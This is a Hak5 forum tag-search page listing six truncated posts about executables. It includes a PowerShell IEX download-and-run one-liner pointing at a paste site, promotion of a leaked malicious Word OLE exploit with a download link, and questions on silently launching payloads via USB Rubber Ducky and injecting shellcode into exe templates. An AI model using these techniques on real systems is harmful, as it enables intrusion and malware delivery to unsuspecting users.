Jump to content

Search the Community

Showing results for tags 'exe'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Enter a five letter word.

Found 6 results

  1. Hi This is my first question here hope someone can help I have converted puty.exe to putty.vbs and also I have also tried convert the exe to base64 Im trying to download (both vbs and base64 exe) it but Im not being able to succeed the vbs is on "https://www.codepile.net/raw/rjzpdEKZ.vbs" but https://www.codepile.net/raw/rjzpdEKZ works too I have tried 1 - IEX (new-object net.webclient).downloadstring("https://www.codepile.net/raw/rjzpdEKZ") 2 - Invoke-Expression -Command $([string]([System.Text.Encoding]::Unicode.Ge
  2. “Hackers are using booby-trapped Word documents to deliver malware to unsuspecting victims. The malware exploits Windows Object Linking and Embedding (OLE) features, which allow users to link to documents and other objects – in this case, a malicious remote server.”Source: https://www.vadesecure.com/en/word-doc-malware/This tool was created by the AutoLog team and has been since leaked. Here is the latest version of their OLE Doc Exploit.VirusTotal: https://www.virustotal.com/#/file/1b59c575fc8f3357982a4d917300725065946e31e3dd39f8b00c084aae8f3314/detection Download: https://www.0dayexploi
  3. Hi, i have a computer where the execute command and the cmd is blocked can i use the rubber ducky to execute a exe file or a batch file directly from the sd card when i plug the usb in? If yes, can you please explain me how? Thanks for the help ^^
  4. Hello, I have been searching the forums, and have been playing around with the basic 'Start cmd -> Mount DUCKY drive -> execute payload' scripts. The mounting portion of the script is all done silently, however the start CMD and deploying the diskpart commands that create a lot of noise, and require the exploitee to not touch anything or it will interrupt the script. Perhaps I need to do more searching, but offhand, does anyone have a way of deploying an exe ASAP once the drive is inserted? Preferably something that will not require no action in order to deploy correctly. It doesn'
  5. I would like to know if there is a way to generate random exe templates for injecting custom shellcode into; just like msf pro does. Is there a manual way to do this? If not, where can I find the information I will need to write my own? I am not a programmer so this will need to be VERY good instruction for me to be able to follow. I am willing to learn but I am very inexperienced here. I basically need to be able to create my own custom/random exe template then know how to add the custom shellcode into it that is created by msfvenom's output so that it runs. Thanks to all who help!
  6. Hey guys, I would like to go about creating a payload for the Rubber Ducky that pretty much does the same thing as the *RunEXE from SD* payload but on OSX using a .JAR file. How would I do this? The payload for EXE files on windows uses a batch file that waits for the SD card to be mounted but OSX doesn't use batch files? Sorry for my inexperience, I am both a Windows and a Kali user but need this payload for penetration testing on Macs. I think the only alternative would be to open a OSX backdoor and download and run the file in terminal. I would rather not resort to this though because if
×
×
  • Create New...